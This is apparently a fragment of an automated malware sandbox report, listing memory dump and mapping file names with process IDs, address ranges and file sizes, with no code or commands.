memory/4268-278-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4268-274-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4268-272-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4268-268-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4296-183-0x0000000000000000-mapping.dmp
-
memory/4420-169-0x0000000000000000-mapping.dmp
-
memory/4492-223-0x0000000000000000-mapping.dmp
-
memory/4532-165-0x0000000000000000-mapping.dmp
-
memory/4548-134-0x0000000000000000-mapping.dmp
-
memory/4576-166-0x0000000000000000-mapping.dmp
-
memory/4580-209-0x0000000000000000-mapping.dmp
-
memory/4740-148-0x0000000000000000-mapping.dmp
-
memory/4740-153-0x0000000002C80000-0x0000000003193000-memory.dmpFilesize
5.1MB
-
memory/4844-210-0x0000000000000000-mapping.dmp
-
memory/4912-138-0x0000000000000000-mapping.dmp
-
memory/4964-144-0x0000000000000000-mapping.dmp
-
memory/5004-161-0x0000000000000000-mapping.dmp
-
memory/5068-147-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/5068-140-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/5068-139-0x0000000000000000-mapping.dmp
-
memory/5068-255-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/5104-193-0x0000000000000000-mapping.dmp